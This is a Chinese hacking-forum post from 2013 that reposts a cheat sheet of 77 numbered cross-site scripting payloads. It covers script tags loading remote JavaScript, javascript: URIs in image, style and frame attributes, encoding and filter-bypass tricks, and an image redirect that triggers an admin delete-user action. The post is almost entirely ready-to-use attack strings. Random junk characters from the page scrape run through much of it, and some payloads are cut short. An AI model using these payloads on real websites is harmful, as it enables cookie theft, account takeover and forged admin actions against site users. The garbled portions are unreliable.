找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2872|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。# v- V) N6 S& i3 d: N8 X& Z) Y
(1)普通的XSS JavaScript注入1 C; D0 S  r3 M  O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># ?4 v0 ?: s% v- p6 c
(2)IMG标签XSS使用JavaScript命令
3 s* U7 ~, K& X<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ K% }  ]2 L$ q/ f
(3)IMG标签无分号无引号8 q2 }+ Q  a/ ^) M( Q
<IMG SRC=javascript:alert(‘XSS’)>8 r6 j) ~2 s; I1 }; K
(4)IMG标签大小写不敏感
; l' A/ c) k% {% z<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 N- J5 w" v( k% Q2 U1 M( b4 A(5)HTML编码(必须有分号)) r1 e4 m8 `! @9 S: z% L2 I
<IMG SRC=javascript:alert(“XSS”)>
* @8 _5 A9 @* w! B! A(6)修正缺陷IMG标签2 W  \; v4 k0 B4 j% H  ?  p! J
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>1 V; f4 ?; D& n1 S' }: T& v& J, P
! O  i  f/ O. y: N3 A# _
$ t" C7 `6 U: |# N% F7 Q  f+ J9 D8 s
(7)formCharCode标签(计算器)
* h9 h& S. R- N0 U0 ]) {: K4 L( W* b<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& I! T: Y, o4 d(8)UTF-8的Unicode编码(计算器)
- b/ s# |1 |. a6 w% k<IMG SRC=jav..省略..S')>
$ g) m1 _9 V0 ~. R- Z) w(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* Y! _: T4 p5 @
<IMG SRC=jav..省略..S')>3 f' M+ c# u( J
(10)十六进制编码也是没有分号(计算器)
$ R0 l+ R" \; t2 n) P" J5 `<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>( K3 F( ?# w' A! k& Q8 t. X
(11)嵌入式标签,将Javascript分开
0 R, G+ m* h: U" U2 p. O; D' A<IMG SRC=”jav ascript:alert(‘XSS’);”>
. y+ L* M4 q5 t+ O& L(12)嵌入式编码标签,将Javascript分开
9 U/ G5 Z6 |% n5 J<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ k0 b0 J# w! k1 u  W(13)嵌入式换行符# i0 D% t5 g+ u; Z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 b( M, |5 P0 g7 o3 p(14)嵌入式回车8 ~) \/ C4 S" _" s7 W
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, P" K9 T" T( F! b4 o(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ c8 q1 s! o, T3 S* F4 [" u<IMG SRC=”javascript:alert(‘XSS‘)”>
4 E# p' [. _4 m! l' t(16)解决限制字符(要求同页面)
, j$ |1 K. M( \; ^- `<script>z=’document.’</script>
6 H! a! N3 }' L6 f& ]" W<script>z=z+’write(“‘</script>
# f* q' d3 e. K8 o" _<script>z=z+’<script’</script>0 H8 e! R* h- t6 _2 E2 l
<script>z=z+’ src=ht’</script>
3 {4 l/ p% @  {* s* o$ n  r5 g<script>z=z+’tp://ww’</script>
2 H6 [- Z) L; B<script>z=z+’w.shell’</script>8 d- V, ]! I+ a( ]* z* \
<script>z=z+’.net/1.’</script>& `) m- a9 Q" c- ~( T- n% L  @
<script>z=z+’js></sc’</script>
3 ]- j$ c8 e2 |1 n<script>z=z+’ript>”)’</script>
4 [+ ~% y& L) D8 r; m<script>eval_r(z)</script>9 ?" P5 |& {7 i: J' ^3 [, x
(17)空字符12-7-1 T00LS - Powered by Discuz! Board& U* {. N5 V( q# `9 C9 B/ @
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
3 o3 ?2 p* s% F" J% sperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out2 ^$ o  X% b( O  b
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( L. T6 l( Q' e# _3 P7 H6 ]+ Dperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) J7 q7 Z7 b3 W4 G8 m
(19)Spaces和meta前的IMG标签7 _" m6 n5 t6 S4 H  t. i4 n; O
<IMG SRC=” javascript:alert(‘XSS’);”>
4 T/ m& ?! X6 V- u; W+ j(20)Non-alpha-non-digit XSS
3 O+ L& @: J. y, ^9 e2 G0 @<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, h  S4 W7 X' E' A0 y. v
(21)Non-alpha-non-digit XSS to 2
0 \6 u* h% c/ i' A- V* ~% i<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
" s  {- |! L( E( Y. ](22)Non-alpha-non-digit XSS to 3
/ {5 `3 c+ ]. x' n# w<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! ^. ], _2 S9 T, Z% @3 O- |4 [
(23)双开括号8 \  v6 ^! B8 z+ J* g% e5 L+ ]
<<SCRIPT>alert(“XSS”);//<</SCRIPT>! ~& T, D( K" a+ R
(24)无结束脚本标记(仅火狐等浏览器)# d. ?0 q2 g8 z
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 p" [, y  O; l0 o( j) t(25)无结束脚本标记2
: n) e2 j1 Z" t0 F. h3 M+ ~<SCRIPT SRC=//3w.org/XSS/xss.js>' {. Q) {% Z+ f9 C, T
(26)半开的HTML/JavaScript XSS7 a/ q! {8 R, Q: K/ C
<IMG SRC=”javascript:alert(‘XSS’)”
# J9 T. j+ T* J& m* l(27)双开角括号
" ]5 n; A8 ?  z  [+ M<iframe src=http://3w.org/XSS.html <
. h0 u$ D, ^9 N) A+ ~(28)无单引号 双引号 分号
, y2 ?! a  v: A) b' L" X% ]( S<SCRIPT>a=/XSS/; _0 g0 T# f- E- u# w; O
alert(a.source)</SCRIPT>
# X' Q5 t5 E! O$ x  M! |(29)换码过滤的JavaScript/ e6 V* f+ n  ~' s+ T8 o
\”;alert(‘XSS’);//
- a3 H$ {. b* Y(30)结束Title标签6 S* K5 }7 x& A. ]& [6 h
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ M7 h4 n( `: v7 O/ P
(31)Input Image
% U8 Q& x/ }: w; x2 w<INPUT SRC=”javascript:alert(‘XSS’);”>
% f" @% @8 q. `3 }/ u(32)BODY Image. J* B$ j; g- c0 A1 y! [
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
7 x8 e' `( ^5 t0 Q. j(33)BODY标签
* E0 s( n( w: |<BODY(‘XSS’)>
( ]. C. l4 Y/ J(34)IMG Dynsrc5 m! }1 J7 c2 F% v& j
<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 ]: D# F+ Z( z$ P5 m! H3 y
(35)IMG Lowsrc
6 O0 ]* H0 [9 L2 d7 F" E* r<IMG LOWSRC=”javascript:alert(‘XSS’)”>: ?& q4 h% p/ _
(36)BGSOUND
8 G1 X- b  `$ }<BGSOUND SRC=”javascript:alert(‘XSS’);”>
+ k7 ^* m! R* ~(37)STYLE sheet
0 n- o/ T2 T! U; Q  @. E* u<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
/ n1 M5 z" R7 L0 c. j/ ](38)远程样式表0 p1 M6 `& p) F9 N
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. B) @. P6 s. \( L  I; n" p(39)List-style-image(列表式), S- }; v  H7 g6 |+ c
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS: H, y9 V# |: C, J' O6 T! V2 v
(40)IMG VBscript8 F/ b4 c3 z% |& I6 F- i
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
" z  F; [5 W9 [! a; `# ]+ T(41)META链接url1 O5 {3 z" O2 J; ]9 A4 F8 i
3 s" n7 I. \3 ]1 ?* _2 v. z

3 z- H! r" h: L" a<META HTTP-EQUIV=”refresh” CONTENT=”0;
8 j! D1 N, u  p5 B( y- v! H9 I' h( JURL=http://;URL=javascript:alert(‘XSS’);”>
: C, V0 w- s0 \. a+ a(42)Iframe, }3 g% |% w& u
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>9 r) V: c2 _3 c, B
(43)Frame
( A1 b6 U- b# [% h. B. _* \, @8 u7 `! u<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
% v; ]! I0 p6 t& J' U9 {https://www.t00ls.net/viewthread ... table&tid=15267 3/6( L9 f  A3 b6 L/ K/ S. j
(44)Table
" R0 Z1 t3 F; f5 H<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' A7 g5 x& l3 ^  ~/ `5 u6 v" \/ K& Q(45)TD' }' i$ P% h( w5 g# u: y2 M
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 W* k/ P# B3 o% }/ D0 A- }3 |(46)DIV background-image9 i2 b; o* h- N( e3 ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! |9 |3 R! ?$ d: J( y
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
5 F; q6 a! [% Z. Z; B8&13&12288&65279)
, [( I  p( ?4 E- P! z9 c/ K7 s<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 _, Y, d! d' K' a: k
(48)DIV expression/ u8 u9 K& D( ?2 J  l0 c4 M/ m4 q
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
9 C! K/ A  U7 u+ j- ]6 n+ F( M(49)STYLE属性分拆表达) o/ M4 B, m) U: N
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>. }' k8 T# |- t/ G5 ]- H  ]3 k: A
(50)匿名STYLE(组成:开角号和一个字母开头)- e& y& \6 x# C
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>+ ^# Y6 c+ u  K$ q+ p( k( J$ ~
(51)STYLE background-image
8 I9 ?) @7 z5 W* w9 ?# N' ~) f3 o& Q<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
+ a. e" B% t, {CLASS=XSS></A>  ^6 |; i$ K" W( _0 ]$ s7 @
(52)IMG STYLE方式
* I2 L7 K  }, @4 _exppression(alert(“XSS”))’>6 W6 Z0 M7 ~; e1 @: y2 d
(53)STYLE background
) a/ g6 ~; t; k  u1 D7 E9 t, m<STYLE><STYLE
, d4 B6 ^( t. u" x1 N: Rtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- R1 @( N  h& z7 X
(54)BASE2 L( o- W2 c7 y' U$ a8 O! ]
<BASE HREF=”javascript:alert(‘XSS’);//”>
# B$ U! l0 I* j(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 N, G4 f) @2 r+ [
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
0 P) a+ W# E) m3 f7 u(56)在flash中使用ActionScrpt可以混进你XSS的代码1 f. w& [  m+ e7 j. D8 {* c
a=”get”;2 R, E! {/ }5 F! x8 Y" ^, Y4 \
b=”URL(\”";) w5 x+ l6 `! e, V1 d& U9 Y
c=”javascript:”;
$ T0 i9 W* s6 R- wd=”alert(‘XSS’);\”)”;: X/ e# [/ x' P, }$ _" S) V. O
eval_r(a+b+c+d);
' y% @! _% c6 z7 G( ]% `(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 z+ l4 {" E9 \( }: C
<HTML xmlns:xss>
1 L7 l. x7 f' u+ ?4 J% Z<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
; W" ?, h. n* c( t! X<xss:xss>XSS</xss:xss>& \9 Z: d& e6 S/ r( ~. M
</HTML>
: F, m' G' D( n* ]9 i  ](58)如果过滤了你的JS你可以在图片里添加JS代码来利用
! s: i! x% M. b- f, d) }. K<SCRIPT SRC=””></SCRIPT>9 r% c  [3 t/ j- u1 w
(59)IMG嵌入式命令,可执行任意命令
. Z$ h. b  s7 \1 X2 f<IMG SRC=”http://www.XXX.com/a.php?a=b”>5 m) A9 p7 V, r+ l2 t* x2 F
(60)IMG嵌入式命令(a.jpg在同服务器)$ T) `& J: F4 h# o; I; F
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser, Y& b8 d) o+ t. C) Z
(61)绕符号过滤7 C& W! ^+ z/ a8 T: |1 V
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ X" @( u: D* L( {% h1 b
(62)
6 v$ X7 t0 {* C! r+ ]<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 I6 \* i0 S# ~$ [6 k5 d
(63)* h* e1 |& ?4 i; L& e
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>, w6 A3 D$ S* D- V- P7 [7 x4 m
(64)  |% `' F1 |5 u, r) p3 |! u( {
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 B- b2 x) I! M4 o
(65)+ R, V1 G  L7 G) d' r6 M8 k: S: T
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ b8 H3 {4 ~% Q+ t# E0 i(66)12-7-1 T00LS - Powered by Discuz! Board1 P# ^3 G! k# _; q
https://www.t00ls.net/viewthread ... table&tid=15267 4/6" j2 b7 k1 `3 T
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>. ]: y# P6 X! ~5 Y( w8 Q
(67)
0 _; t+ L* a9 n<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>7 B5 Z# Q) x8 V+ j# k2 z3 r
</SCRIPT>6 x( H5 {# h% G  D4 ?" H" }. T3 I+ d
(68)URL绕行
7 l2 [. T2 {7 f# C<A HREF=”http://127.0.0.1/”>XSS</A>9 j* k. |( y+ `) }
(69)URL编码. }! F) |( k* p3 w. f) O! S5 L
<A HREF=”http://3w.org”>XSS</A>
6 T) ?$ i+ y: w(70)IP十进制
( v6 {& j" `% Y9 x, {# r0 h# n8 m% R<A HREF=”http://3232235521″>XSS</A>
+ u  y4 D' k% q" k. d# A2 E9 h( g(71)IP十六进制
+ W2 _8 A" k8 @- B- m2 C5 _<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* n1 t" {3 ]( K+ g; `(72)IP八进制
" V6 q1 y  c* ?" W, j<A HREF=”http://0300.0250.0000.0001″>XSS</A>5 M+ N4 l5 _2 a$ l* W% `
(73)混合编码
8 M7 R  b1 |! Y# ~% q. T<A HREF=”h* W8 @4 s. p0 ?5 I0 m% t
tt p://6 6.000146.0×7.147/”">XSS</A>% j$ }4 k6 Q- `5 T& F0 d* ^% w  u
(74)节省[http:]- l9 z: D8 {, R0 D
<A HREF=”//www.google.com/”>XSS</A>) r- r/ \& w! Z+ x
(75)节省[www]
  u. B8 e( J1 ]7 h5 I<A HREF=”http://google.com/”>XSS</A>. Z1 L" z: ~  W" v+ h4 Z
(76)绝对点绝对DNS( s, R0 {% \: N( S. q9 `
<A HREF=”http://www.google.com./”>XSS</A>7 z8 F- X  h: d. }; z
(77)javascript链接* ^2 T9 Q; U/ v
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>  c# A4 ^! K6 c; \( P

8 }" M( j# k" |1 a" w- ~2 v) l1 r4 {原文地址:http://fuzzexp.org/u/0day/?p=14/ I$ P; p  j. k6 T$ z- o

# s6 b2 v# k: a2 I- c# n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表